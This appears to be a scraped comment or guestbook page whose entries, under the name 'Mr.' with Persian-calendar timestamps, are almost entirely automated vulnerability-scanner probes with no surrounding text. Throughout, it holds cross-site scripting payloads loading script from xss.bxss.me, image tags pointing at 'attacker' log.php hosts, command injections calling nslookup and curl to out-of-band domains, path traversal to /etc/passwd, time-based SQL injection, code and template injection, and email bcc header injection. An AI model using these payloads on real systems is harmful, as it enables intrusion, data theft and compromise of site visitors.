  555<input autofocus onfocus=UOYm(9920)>

  <a HrEF=http://xss.bxss.me></a>
  1402/04/29 08:59

  555

  Mr.
  1402/04/29 08:59

  <a HrEF=http://xss.bxss.me></a>

  <a HrEF=jaVaScRiPT:>
  1402/04/29 08:59

  555

  Mr.
  1402/04/29 08:59

  <a HrEF=jaVaScRiPT:>

  Mr.}body{zzz:Expre/**/SSion(ReF6(9286))}
  1402/04/29 08:59

  555

  Mr.
  1402/04/29 08:59

  555}body{zzz:Expre/**/SSion(UOYm(9736))}

  Mr.qKERf <ScRiPt >ReF6(9116)</ScRiPt>
  1402/04/29 08:59

  555

  Mr.
  1402/04/29 08:59

  555wts8r
  <ScRiPt >UOYm(9256)</ScRiPt>

  Mr.<WOULV3>KRJQ0[!+!]</WOULV3>
  1402/04/29 08:59

  555

  Mr.
  1402/04/29 09:00

  555<WMWREQ>70SFC[!+!]</WMWREQ>

  Mr.<ifRAme sRc=9335.com></IfRamE>
  1402/04/29 09:00

  555

  Mr.
  1402/04/29 09:00

  555<ifRAme sRc=9147.com></IfRamE>

  Mr.<a8gNaH1 x=9274>
  1402/04/29 09:00

  555

  Mr.
  1402/04/29 09:00

  555<a6u6HJ0 x=9211>

  Mr.<img sRc='http://attacker-9599/log.php?
  1402/04/29 09:00

  555

  Mr.
  1402/04/29 09:00

  555<img sRc='http://attacker-9745/log.php?

  Mr.<aRsdTtL<
  1402/04/29 09:00

  555

  Mr.
  1402/04/29 09:00

  555<a2qTP7I<

  Mr.
  1402/04/29 09:33

  response.write(9760999*9819020)

  Mr.
  1402/04/29 09:33

  echo lompqo$()\ pdnvcu\nz^xyu||a #' &echo lompqo$()\ pdnvcu\nz^xyu||a #|" &echo lompqo$()\ pdnvcu\nz^xyu||a #

  Mr.
  1402/04/29 09:33

  '+response.write(9760999*9819020)+'

  Mr.
  1402/04/29 09:33

  &echo iyhdjy$()\ jmfqmd\nz^xyu||a #' &echo iyhdjy$()\ jmfqmd\nz^xyu||a #|" &echo iyhdjy$()\ jmfqmd\nz^xyu||a #

  Mr.
  1402/04/29 09:33

  "+response.write(9760999*9819020)+"

  Mr.
  1402/04/29 09:33

  |echo qhyaos$()\ rvqylw\nz^xyu||a #' |echo qhyaos$()\ rvqylw\nz^xyu||a #|" |echo qhyaos$()\ rvqylw\nz^xyu||a #

  Mr.
  1402/04/29 09:33

  (nslookup -q=cname hitbhxoznmscn793c6.bxss.me||curl hitbhxoznmscn793c6.bxss.me))

  Mr.
  1402/04/29 09:33

  $(nslookup -q=cname hitfjgmwsftte6070c.bxss.me||curl hitfjgmwsftte6070c.bxss.me)

  Mr.
  1402/04/29 09:33

  &nslookup -q=cname hitcrcjlxmzvt3a0c4.bxss.me&'\"`0&nslookup -q=cname hitcrcjlxmzvt3a0c4.bxss.me&`'

  Mr.
  1402/04/29 09:33

  &(nslookup -q=cname hittqzzvuhcql6f9ec.bxss.me||curl hittqzzvuhcql6f9ec.bxss.me)&'\"`0&(nslookup -q=cname hittqzzvuhcql6f9ec.bxss.me||curl hittqzzvuhcql6f9ec.bxss.me)&`'

  Mr.
  1402/04/29 09:33

  |(nslookup -q=cname hitxvihhnnvcr96818.bxss.me||curl hitxvihhnnvcr96818.bxss.me)

  Mr.
  1402/04/29 09:33

  `(nslookup -q=cname hitwppjlrqykv7e747.bxss.me||curl hitwppjlrqykv7e747.bxss.me)`

  Mr.
  1402/04/29 09:33

  ;(nslookup -q=cname hitycprogipvf026e0.bxss.me||curl hitycprogipvf026e0.bxss.me)|(nslookup -q=cname hitycprogipvf026e0.bxss.me||curl hitycprogipvf026e0.bxss.me)&(nslookup -q=cname hitycprogipvf026e0.bxss.me||curl hitycprogipvf026e0.bxss.me)

  Mr.
  1402/04/29 09:33

  5QYTw5yr

  Mr.
  1402/04/29 09:33

  ../../../../../../../../../../../../../../etc/passwd

  Mr.
  1402/04/29 09:33

  ../../../../../../../../../../../../../../windows/win.ini

  Mr.
  1402/04/29 09:33

  file:///etc/passwd

  Mr.
  1402/04/29 09:33

  ../

  Mr.
  1402/04/29 09:33

  ./

  Mr.
  1402/04/29 09:33

  bcc:074625.447-446036.447.64d00.19558.2@bxss.me

  Mr.
  1402/04/29 09:33

  to@example.com>
  bcc:074625.447-446037.447.64d00.19558.2@bxss.me

  Mr.
  1402/04/29 09:33

  <esi:include src="http://bxss.me/rpb.png"/>

  Mr.
  1402/04/29 09:33

  ${9999717+9999482}

  Mr.
  1402/04/29 09:33

  http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs?.jpg

  Mr.
  1402/04/29 09:33

  1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs.jpg

  Mr.
  1402/04/29 09:33

  Http://bxss.me/t/fit.txt

  Mr.
  1402/04/29 09:33

  http://bxss.me/t/fit.txt?.jpg

  Mr.
  1402/04/29 09:33

  /etc/shells

  Mr.
  1402/04/29 09:33

  c:/windows/win.ini

  Mr.
  1402/04/29 09:33

  bxss.me

  Mr.
  1402/04/29 09:33

  &n937264=v996813

  Mr.
  1402/04/29 09:34

  )

  Mr.
  1402/04/29 09:34

  !(()&&!|*|*|

  Mr.
  1402/04/29 09:34

  ^(#$!@#$)(()))******

  Mr.
  1402/04/29 09:34

  -1 OR 2+319-319-1=0+0+0+1 --

  Mr.
  1402/04/29 09:34

  -1 OR 3+319-319-1=0+0+0+1 --

  Mr.
  1402/04/29 09:34

  -1 OR 2+970-970-1=0+0+0+1

  Mr.
  1402/04/29 09:34

  -1 OR 3+970-970-1=0+0+0+1

  Mr.
  1402/04/29 09:34

  -1' OR 2+394-394-1=0+0+0+1 --

  Mr.
  1402/04/29 09:34

  -1' OR 3+394-394-1=0+0+0+1 --

  Mr.
  1402/04/29 09:34

  -1' OR 2+877-877-1=0+0+0+1 or 'DGbSghDg'='

  Mr.
  1402/04/29 09:34

  -1' OR 3+877-877-1=0+0+0+1 or 'DGbSghDg'='

  Mr.
  1402/04/29 09:34

  -1" OR 2+940-940-1=0+0+0+1 --

  Mr.
  1402/04/29 09:34

  -1" OR 3+940-940-1=0+0+0+1 --

  Mr.
  1402/04/29 09:34

  '"()

  Mr.
  1402/04/29 09:34

  '&&sleep(27*1000)*cnadkn&&'

  Mr.
  1402/04/29 09:34

  "&&sleep(27*1000)*yncjpu&&"

  Mr.
  1402/04/29 09:34

  '||sleep(27*1000)*kdbfbj||'

  Mr.
  1402/04/29 09:34

  "||sleep(27*1000)*krvhbf||"

  Mr.
  1402/04/29 09:34

  '.gethostbyname(lc('hitwp'.'twhmobec0b329.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(97).chr(72).chr(109).chr(87).'

  Mr.
  1402/04/29 09:34

  ".gethostbyname(lc("hitgy"."lbrtuuojdcce3.bxss.me."))."A".chr(67).chr(hex("58")).chr(106).chr(89).chr(121).chr(74)."

  Mr.
  1402/04/29 09:35

  ;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));

  Mr.
  1402/04/29 09:35

  ';print(md5(31337));$a='

  Mr.
  1402/04/29 09:35

  ";print(md5(31337));$a="

  Mr.
  1402/04/29 09:35

  ${@print(md5(31337))}

  Mr.
  1402/04/29 09:35

  ${@print(md5(31337))}\

  Mr.
  1402/04/29 09:35

  '.print(md5(31337)).'

  Mr.
  1402/04/29 09:35

  if(now()=sysdate(),sleep(15),0)

  Mr.
  1402/04/29 09:35

  ctime
  sleep
  p0
  (I30
  tp1
  Rp2
  .

  Mr.
  1402/04/29 09:35

  HttP://bxss.me/t/xss.html?%00

  Mr.
  1402/04/29 09:35

  bxss.me/t/xss.html?%00

  Mr.
  1402/04/29 09:35

  "+"A".concat(70-3).concat(22*4).concat(105).concat(83).concat(106).concat(77)+(require"socket"
  Socket.gethostbyname("hitnq"+"klrosvwa5396c.bxss.me.")[3].to_s)+"

  Mr.
  1402/04/29 09:35

  '+'A'.concat(70-3).concat(22*4).concat(103).concat(73).concat(97).concat(69)+(require'socket'
  Socket.gethostbyname('hitcy'+'jprbzwty231f8.bxss.me.')[3].to_s)+'

  Mr.
  1402/04/29 09:36

  %D8%B4%D8%B1%DA%A9%D8%AA-%D9%84%D9%88%DA%A9%D8%A7%D8%B1%D8%AA

  Mr.
  1402/04/29 09:36

  %D8%B4%D8%B1%DA%A9%D8%AA-%D9%84%D9%88%DA%A9%D8%A7%D8%B1%D8%AA

  Mr.
  1402/04/29 09:36

  %D8%B4%D8%B1%DA%A9%D8%AA-%D9%84%D9%88%DA%A9%D8%A7%D8%B1%D8%AA/.

  Mr.
  1402/04/29 09:36

  )))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

  Mr.
  1402/04/29 09:36

  0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z

  Mr.
  1402/04/29 09:36

  xfs.bxss.me

  Mr.
  1402/04/29 09:36

  '"

  Mr.
  1402/04/29 09:36

  <!--

  Mr.
  1402/04/29 09:36

  '"()&%<zzz><ScRiPt >eLlp(9678)</ScRiPt>

  Mr.
  1402/04/29 09:36

  '"()&%<zzz><ScRiPt >eLlp(9392)</ScRiPt>

  Mr.
  1402/04/29 09:36

  9446774

  Mr.
  1402/04/29 09:36

  555'"()&%<zzz><ScRiPt >8uk4(9641)</ScRiPt>

  Mr.
  1402/04/29 09:36

  bfg7966<s1﹥s2ʺs3ʹhjl7966

  Mr.
  1402/04/29 09:37

  bfgx1463%C0%BEz1%C0%BCz2a%90bcxhjl1463

  Mr.
  1402/04/29 09:37

  <%={{={@{#{${dfb}}%>

  Mr.
  1402/04/29 09:37

  0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z

  Mr.
  1402/04/29 09:37

  '"()&%<zzz><ScRiPt >8uk4(9872)</ScRiPt>

  Mr.
  1402/04/29 09:37

  <th:t="${dfb}#foreach

  Mr.
  1402/04/29 09:37

  1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>

  Mr.
  1402/04/29 09:37

  dfb{{98991*97996}}xca

  Mr.
  1402/04/29 09:37

  5559276290

  Mr.
  1402/04/29 09:37

  dfb[[${98991*97996}]]xca

  Mr.
  1402/04/29 09:37

  dfb__${98991*97996}__::.x

  Mr.
  1402/04/29 09:37

  "dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")

  Mr.
  1402/04/29 09:37

  bfg1469<s1﹥s2ʺs3ʹhjl1469

  Mr.
  1402/04/29 09:37

  <ScRiPt >eLlp(9592)</ScRiPt>

  Mr.
  1402/04/29 09:37

  <WYEQMO>FSJML[!+!]</WYEQMO>

  Mr.
  1402/04/29 09:37

  <script>eLlp(9615)</script>

  Mr.
  1402/04/29 09:37

  bfgx3920%C0%BEz1%C0%BCz2a%90bcxhjl3920

  Mr.
  1402/04/29 09:37

  <ScR<ScRiPt>IpT>eLlp(9303)</sCr<ScRiPt>IpT>

  Mr.
  1402/04/29 09:37

  <ScRiPt
  >eLlp(9911)</ScRiPt>

  Mr.
  1402/04/29 09:37

  (select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/

  Mr.
  1402/04/29 09:37

  <ScRiPt/zzz src=//xss.bxss.me/t/xss.js?9063></ScRiPt>

  Mr.
  1402/04/29 09:37

  <%={{={@{#{${dfb}}%>

  Mr.'"()&%<zzz><ScRiPt >0L6Y(9622)</ScRiPt>
  1402/04/29 09:37

  555

  Mr.
  1402/04/29 09:37

  <ScRiPt
  >eLlp(9787)</ScRiPt>

  Mr.
  1402/04/29 09:37

  <svg  

  %A0onload=eLlp(9141);>

  Mr.
  1402/04/29 09:38

  <isindex type=image src=1 onerror=eLlp(9092)>

  Mr.
  1402/04/29 09:38

  <iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9429'>

  Mr.
  1402/04/29 09:38

  <th:t="${dfb}#foreach

  '"()&%<zzz><ScRiPt >0L6Y(9012)</ScRiPt>
  1402/04/29 09:38

  555

  Mr.
  1402/04/29 09:38

  <body onload=eLlp(9330)>

  Mr.
  1402/04/29 09:38

  <img src=//xss.bxss.me/t/dot.gif onload=eLlp(9182)>

  Mr.
  1402/04/29 09:38

  555

  Mr.
  1402/04/29 09:38

  <img src=xyz OnErRor=eLlp(9273)>

  Mr.9609235
  1402/04/29 09:38

  555

  Mr.
  1402/04/29 09:38

  <img/src=">" onerror=alert(9634)>

  Mr.
  1402/04/29 09:38

  %0D%0A%3C%53%63%52%69%50%74%20%3E%65%4C%6C%70%289906%29%3C%2F%73%43%72%69%70%54%3E

  Mr.
  1402/04/29 09:38

  -1; waitfor delay '0:0:15' --

  Mr.
  1402/04/29 09:38

  1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>

  bfg5341<s1﹥s2ʺs3ʹhjl5341
  1402/04/29 09:38

  555

  Mr.
  1402/04/29 09:38

  \u003CScRiPt\eLlp(9153)\u003C/sCripT\u003E

  Mr.
  1402/04/29 09:38

  &lt;ScRiPt&gt;eLlp(9257)&lt;/sCripT&gt;

  Mr.
  1402/04/29 09:38

  %F6<img zzz onmouseover=eLlp(98071) //%F6>

  Mr.
  1402/04/29 09:38

  555

  bfgx1689%C0%BEz1%C0%BCz2a%90bcxhjl1689
  1402/04/29 09:38

  555

  Mr.
  1402/04/29 09:38

  <input autofocus onfocus=eLlp(9312)>

  Mr.
  1402/04/29 09:38

  <a HrEF=http://xss.bxss.me></a>

  Mr.
  1402/04/29 09:38

  <a HrEF=jaVaScRiPT:>

  Mr.
  1402/04/29 09:38

  dfb{{98991*97996}}xca

  <%={{={@{#{${dfb}}%>
  1402/04/29 09:38

  555

  Mr.
  1402/04/29 09:38

  }body{zzz:Expre/**/SSion(eLlp(9325))}

  Mr.
  1402/04/29 09:38

  ZvAhZ
  <ScRiPt >eLlp(9033)</ScRiPt>

  Mr.
  1402/04/29 09:38

  <WJ86ER>MTGQ3[!+!]</WJ86ER>

  Mr.
  1402/04/29 09:38

  dfb[[${98991*97996}]]xca

  <th:t="${dfb}#foreach
  1402/04/29 09:38

  555

  Mr.
  1402/04/29 09:38

  <ifRAme sRc=9197.com></IfRamE>

  Mr.
  1402/04/29 09:39

  -1); waitfor delay '0:0:15' --

  Mr.
  1402/04/29 09:39

  <aMUlYYz x=9951>

  Mr.
  1402/04/29 09:39

  <img sRc='http://attacker-9607/log.php?

  1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>
  1402/04/29 09:39

  555

  Mr.
  1402/04/29 09:39

  dfb__${98991*97996}__::.x

  Mr.
  1402/04/29 09:39

  <ahmM3Mj<

  dfb{{98991*97996}}xca
  1402/04/29 09:39

  555

  Mr.
  1402/04/29 09:39

  "dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")

  dfb[[${98991*97996}]]xca
  1402/04/29 09:39

  555

  Mr.
  1402/04/29 09:39

  555<ScRiPt >8uk4(9991)</ScRiPt>

  Mr.
  1402/04/29 09:39

  1 waitfor delay '0:0:15' --

  dfb__${98991*97996}__::.x
  1402/04/29 09:39

  555

  Mr.
  1402/04/29 09:39

  555<WWATPC>4C35E[!+!]</WWATPC>

  "dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")
  1402/04/29 09:39

  555

  Mr.
  1402/04/29 09:39

  555<script>8uk4(9762)</script>

  Mr.
  1402/04/29 09:39

  555<ScR<ScRiPt>IpT>8uk4(9509)</sCr<ScRiPt>IpT>

  Mr.<ScRiPt >0L6Y(9684)</ScRiPt>
  1402/04/29 09:39

  555

  Mr.
  1402/04/29 09:40

  555<ScRiPt
  >8uk4(9194)</ScRiPt>

  Mr.<W52MRG>K91OK[!+!]</W52MRG>
  1402/04/29 09:40

  555

  Mr.
  1402/04/29 09:40

  GWrcORIz'; waitfor delay '0:0:15' --

  Mr.
  1402/04/29 09:40

  555<ScRiPt/zzz src=//xss.bxss.me/t/xss.js?9319></ScRiPt>

  Mr.<script>0L6Y(9813)</script>
  1402/04/29 09:40

  555

  Mr.<ScR<ScRiPt>IpT>0L6Y(9813)</sCr<ScRiPt>IpT>
  1402/04/29 09:40

  555

  Mr.
  1402/04/29 09:40

  555<ScRiPt
  >8uk4(9792)</ScRiPt>

  Mr.
  1402/04/29 09:40

  555<svg  

  %A0onload=8uk4(9437);>

  Mr.<ScRiPt >0L6Y(9749)</ScRiPt>
  1402/04/29 09:40

  555

  Mr.
  1402/04/29 09:40

  -5 OR 665=(SELECT 665 FROM PG_SLEEP(15))--

  Mr.<ScRiPt/zzz src=//xss.bxss.me/t/xss.js?9713></ScRiPt>
  1402/04/29 09:40

  555

  Mr.
  1402/04/29 09:40

  555<isindex type=image src=1 onerror=8uk4(9908)>

  Mr.
  1402/04/29 09:40

  555<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9810'>

  Mr.<�ScRiPt >0L6Y(9393)</ScRiPt>
  1402/04/29 09:40

  555

  Mr.
  1402/04/29 09:41

  555<body onload=8uk4(9803)>

  Mr.<svg %A0�onload=0L6Y(9493);>
  1402/04/29 09:41

  555

  Mr.
  1402/04/29 09:41

  -5) OR 49=(SELECT 49 FROM PG_SLEEP(15))--

  Mr.
  1402/04/29 09:41

  555<img src=//xss.bxss.me/t/dot.gif onload=8uk4(9876)>

  Mr.<isindex type=image src=1 onerror=0L6Y(9165)>
  1402/04/29 09:41

  555

  Mr.
  1402/04/29 09:41

  555<img src=xyz OnErRor=8uk4(9277)>

  Mr.<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9937'>
  1402/04/29 09:41

  555

  Mr.
  1402/04/29 09:41

  555<img/src=">" onerror=alert(9600)>

  Mr.<body onload=0L6Y(9775)>
  1402/04/29 09:41

  555

  Mr.
  1402/04/29 09:41

  %35%35%35%3C%53%63%52%69%50%74%20%3E%38%75%6B%34%289226%29%3C%2F%73%43%72%69%70%54%3E

  Mr.
  1402/04/29 09:41

  -1)) OR 39=(SELECT 39 FROM PG_SLEEP(15))--

  Mr.<img src=//xss.bxss.me/t/dot.gif onload=0L6Y(9053)>
  1402/04/29 09:41

  555

  Mr.
  1402/04/29 09:41

  555\u003CScRiPt\8uk4(9405)\u003C/sCripT\u003E

  Mr.<img src=xyz OnErRor=0L6Y(9677)>
  1402/04/29 09:41

  555

  Mr.
  1402/04/29 09:42

  555&lt;ScRiPt&gt;8uk4(9640)&lt;/sCripT&gt;

  Mr.<img/src=">" onerror=alert(9273)>
  1402/04/29 09:42

  555

  Mr.
  1402/04/29 09:42

  Iw7dc8Jg' OR 396=(SELECT 396 FROM PG_SLEEP(15))--

  Mr.
  1402/04/29 09:42

  %F6<img zzz onmouseover=8uk4(97731) //%F6>

  %4D%72%2E%3C%53%63%52%69%50%74%20%3E%30%4C%36%59%289489%29%3C%2F%73%43%72%69%70%54%3E
  1402/04/29 09:42

  555

  Mr.
  1402/04/29 09:42

  555<input autofocus onfocus=8uk4(9843)>

  Mr.\u003CScRiPt\0L6Y(9842)\u003C/sCripT\u003E
  1402/04/29 09:42

  555

  Mr.
  1402/04/29 09:42

  <a HrEF=http://xss.bxss.me></a>

  Mr.&lt;ScRiPt&gt;0L6Y(9840)&lt;/sCripT&gt;
  1402/04/29 09:42

  555

  %F6<img zzz onmouseover=0L6Y(95631) //%F6>
  1402/04/29 09:42

  555

  Mr.
  1402/04/29 09:42

  <a HrEF=jaVaScRiPT:>

  Mr.
  1402/04/29 09:42

  K8K3IwtZ') OR 530=(SELECT 530 FROM PG_SLEEP(15))--

  Mr.
  1402/04/29 09:42

  555}body{zzz:Expre/**/SSion(8uk4(9717))}

  Mr.<input autofocus onfocus=0L6Y(9064)>
  1402/04/29 09:42

  555

  Mr.
  1402/04/29 09:43

  555BpYhS
  <ScRiPt >8uk4(9625)</ScRiPt>

  <a HrEF=http://xss.bxss.me></a>
  1402/04/29 09:43

  555

  Mr.
  1402/04/29 09:43

  p3kbPRjS')) OR 696=(SELECT 696 FROM PG_SLEEP(15))--

  <a HrEF=jaVaScRiPT:>
  1402/04/29 09:43

  555

  Mr.
  1402/04/29 09:43

  555<WGOIFF>CPH3Y[!+!]</WGOIFF>

  Mr.}body{zzz:Expre/**/SSion(0L6Y(9114))}
  1402/04/29 09:43

  555

  Mr.
  1402/04/29 09:43

  555<ifRAme sRc=9906.com></IfRamE>

  Mr.JCSOF <ScRiPt >0L6Y(9989)</ScRiPt>
  1402/04/29 09:43

  555

  Mr.
  1402/04/29 09:43

  555<ai2ZPWr x=9504>

  Mr.<W8IYYP>BGGEH[!+!]</W8IYYP>
  1402/04/29 09:43

  555

  Mr.
  1402/04/29 09:43

  *DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)

  Mr.
  1402/04/29 09:43

  555<img sRc='http://attacker-9781/log.php?

  Mr.<ifRAme sRc=9345.com></IfRamE>
  1402/04/29 09:44

  555

  Mr.
  1402/04/29 09:44

  555<asjQmg9<

  Mr.<aJ9Ptat x=9814>
  1402/04/29 09:44

  555

  Mr.<img sRc='http://attacker-9025/log.php?
  1402/04/29 09:44

  555

  Mr.
  1402/04/29 09:44

  '||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'

  Mr.
  1402/04/29 09:44

  1'"

  Mr.
  1402/04/29 09:44

  1%C0%A7%C0%A2%2527%2522

  Mr.
  1402/04/29 09:44

  @@fOvk7

  Mr.<aPMzDIK<
  1402/04/29 09:44

  555

  Mr.
  1402/04/29 10:18

  &#xD;&#xA;

  Mr.
  1402/04/29 10:18

  response.write(9127353*9264204)

  Mr.
  1402/04/29 10:18

  '+response.write(9127353*9264204)+'

  Mr.
  1402/04/29 10:18

  echo sgneog$()\ leawln\nz^xyu||a #' &echo sgneog$()\ leawln\nz^xyu||a #|" &echo sgneog$()\ leawln\nz^xyu||a #

  Mr.
  1402/04/29 10:18

  "+response.write(9127353*9264204)+"

  Mr.
  1402/04/29 10:18

  &echo iqykwo$()\ toexvj\nz^xyu||a #' &echo iqykwo$()\ toexvj\nz^xyu||a #|" &echo iqykwo$()\ toexvj\nz^xyu||a #

  response.write(9741241*9349606)
  1402/04/29 10:18

  &#xD;&#xA;

  Mr.
  1402/04/29 10:18

  |echo dixgev$()\ izpejb\nz^xyu||a #' |echo dixgev$()\ izpejb\nz^xyu||a #|" |echo dixgev$()\ izpejb\nz^xyu||a #

  '+response.write(9741241*9349606)+'
  1402/04/29 10:18

  &#xD;&#xA;

  Mr.
  1402/04/29 10:18

  (nslookup -q=cname hittugemybhevff239.bxss.me||curl hittugemybhevff239.bxss.me))

  "+response.write(9741241*9349606)+"
  1402/04/29 10:18

  &#xD;&#xA;

  Mr.
  1402/04/29 10:18

  $(nslookup -q=cname hitkdtgbsnmok35ab0.bxss.me||curl hitkdtgbsnmok35ab0.bxss.me)

  Mr.
  1402/04/29 10:18

  &nslookup -q=cname hitmqulwlrljw32442.bxss.me&'\"`0&nslookup -q=cname hitmqulwlrljw32442.bxss.me&`'

  Mr.
  1402/04/29 10:18

  &(nslookup -q=cname hithnlhaevtvs96c0b.bxss.me||curl hithnlhaevtvs96c0b.bxss.me)&'\"`0&(nslookup -q=cname hithnlhaevtvs96c0b.bxss.me||curl hithnlhaevtvs96c0b.bxss.me)&`'

  Mr.
  1402/04/29 10:18

  |(nslookup -q=cname hitneorxaooiq4b0f8.bxss.me||curl hitneorxaooiq4b0f8.bxss.me)

  Mr.
  1402/04/29 10:18

  `(nslookup -q=cname hitbirpdvfpih666cd.bxss.me||curl hitbirpdvfpih666cd.bxss.me)`

  Mr.
  1402/04/29 10:18

  ;(nslookup -q=cname hitcetvlxgxsib0b70.bxss.me||curl hitcetvlxgxsib0b70.bxss.me)|(nslookup -q=cname hitcetvlxgxsib0b70.bxss.me||curl hitcetvlxgxsib0b70.bxss.me)&(nslookup -q=cname hitcetvlxgxsib0b70.bxss.me||curl hitcetvlxgxsib0b70.bxss.me)

  echo oisxke$()\ uycizd\nz^xyu||a #' &echo oisxke$()\ uycizd\nz^xyu||a #|" &echo oisxke$()\ uycizd\nz^xyu||a #
  1402/04/29 10:18

  &#xD;&#xA;

  &echo iqufiu$()\ nyqhee\nz^xyu||a #' &echo iqufiu$()\ nyqhee\nz^xyu||a #|" &echo iqufiu$()\ nyqhee\nz^xyu||a #
  1402/04/29 10:18

  &#xD;&#xA;

  |echo qgxdxr$()\ tcukyw\nz^xyu||a #' |echo qgxdxr$()\ tcukyw\nz^xyu||a #|" |echo qgxdxr$()\ tcukyw\nz^xyu||a #
  1402/04/29 10:18

  &#xD;&#xA;

  (nslookup -q=cname hitpvjlxituqx402a4.bxss.me||curl hitpvjlxituqx402a4.bxss.me))
  1402/04/29 10:18

  &#xD;&#xA;

  $(nslookup -q=cname hitreeemfprkv7ad88.bxss.me||curl hitreeemfprkv7ad88.bxss.me)
  1402/04/29 10:18

  &#xD;&#xA;

  &nslookup -q=cname hitynqgibwhsabd522.bxss.me&'\"`0&nslookup -q=cname hitynqgibwhsabd522.bxss.me&`'
  1402/04/29 10:18

  &#xD;&#xA;

  &(nslookup -q=cname hitetoehvydux6f496.bxss.me||curl hitetoehvydux6f496.bxss.me)&'\"`0&(nslookup -q=cname hitetoehvydux6f496.bxss.me||curl hitetoehvydux6f496.bxss.me)&`'
  1402/04/29 10:18

  &#xD;&#xA;

  |(nslookup -q=cname hitrphpkeocvef8921.bxss.me||curl hitrphpkeocvef8921.bxss.me)
  1402/04/29 10:18

  &#xD;&#xA;

  `(nslookup -q=cname hitxuclrmgtxlf82bc.bxss.me||curl hitxuclrmgtxlf82bc.bxss.me)`
  1402/04/29 10:18

  &#xD;&#xA;

  Mr.
  1402/04/29 10:18

  DIZR1a8O

  OgJcc8OW
  1402/04/29 10:18

  &#xD;&#xA;

  Mr.
  1402/04/29 10:18

  ../../../../../../../../../../../../../../etc/passwd

  Mr.
  1402/04/29 10:18

  ../../../../../../../../../../../../../../windows/win.ini

  Mr.
  1402/04/29 10:18

  file:///etc/passwd

  Mr.
  1402/04/29 10:18

  &#xD;&#xA;

  Mr.
  1402/04/29 10:18

  ../
  &#xD;&#xA;

  ../../../../../../../../../../../../../../etc/passwd
  1402/04/29 10:18

  &#xD;&#xA;

  ../../../../../../../../../../../../../../windows/win.ini
  1402/04/29 10:18

  &#xD;&#xA;

  file:///etc/passwd
  1402/04/29 10:18

  &#xD;&#xA;

  Mr.
  1402/04/29 10:18

  &#xD;&#xA;

  ../Mr.
  1402/04/29 10:18

  &#xD;&#xA;

  Mr.
  1402/04/29 10:18

  &#xD;&#xA;

  Mr.
  1402/04/29 10:18

  to@example.com>
  bcc:074625.447-451445.447.64d00.19558.2@bxss.me

  Mr. bcc:074625.447-451446.447.64d00.19558.2@bxss.me
  1402/04/29 10:18

  &#xD;&#xA;

  to@example.com> bcc:074625.447-451447.447.64d00.19558.2@bxss.me
  1402/04/29 10:18

  &#xD;&#xA;

  Mr.
  1402/04/29 10:19

  &#xD;&#xA;

  Mr.
  1402/04/29 10:19

  &#xD;&#xA;<esi:include src="http://bxss.me/rpb.png"/>

  Mr.<esi:include src="http://bxss.me/rpb.png"/>
  1402/04/29 10:19

  &#xD;&#xA;

  Mr.
  1402/04/29 10:19

  &#xD;&#xA;

  Mr.
  1402/04/29 10:19

  ${10000403+10000035}

  ${10000169+9999492}
  1402/04/29 10:19

  &#xD;&#xA;

  Mr.
  1402/04/29 10:19

  &#xD;&#xA;

  Mr.
  1402/04/29 10:19

  http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs?.jpg

  Mr.
  1402/04/29 10:19

  &#xD;&#xA;

  Mr.
  1402/04/29 10:19

  1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs.jpg

  Mr.
  1402/04/29 10:19

  Http://bxss.me/t/fit.txt

  Mr.
  1402/04/29 10:19

  http://bxss.me/t/fit.txt?.jpg

  Mr.
  1402/04/29 10:19

  /etc/shells

  Mr.
  1402/04/29 10:19

  c:/windows/win.ini

  Mr.
  1402/04/29 10:19

  bxss.me

  http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs?.
  1402/04/29 10:19

  &#xD;&#xA;

  1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs�.
  1402/04/29 10:19

  &#xD;&#xA;

  Http://bxss.me/t/fit.txt
  1402/04/29 10:19

  &#xD;&#xA;

  http://bxss.me/t/fit.txt?.
  1402/04/29 10:19

  &#xD;&#xA;

  /etc/shells
  1402/04/29 10:19

  &#xD;&#xA;

  c:/windows/win.ini
  1402/04/29 10:19

  &#xD;&#xA;

  bxss.me
  1402/04/29 10:19

  &#xD;&#xA;

  Mr.
  1402/04/29 10:19

  &#xD;&#xA;&n956719=v900158

  Mr.&n948227=v984027
  1402/04/29 10:19

  &#xD;&#xA;

  Mr.
  1402/04/29 10:19

  &#xD;&#xA;

  Mr.
  1402/04/29 10:19

  )

  Mr.
  1402/04/29 10:19

  !(()&&!|*|*|

  Mr.
  1402/04/29 10:19

  ^(#$!@#$)(()))******

  )
  1402/04/29 10:19

  &#xD;&#xA;

  !(()&&!|*|*|
  1402/04/29 10:19

  &#xD;&#xA;

  ^(#$!@#$)(()))******
  1402/04/29 10:19

  &#xD;&#xA;

  Mr.
  1402/04/29 10:19

  &#xD;&#xA;

  Mr.
  1402/04/29 10:19

  -1 OR 2+77-77-1=0+0+0+1 --

  Mr.
  1402/04/29 10:19

  -1 OR 2+511-511-1=0+0+0+1

  Mr.
  1402/04/29 10:19

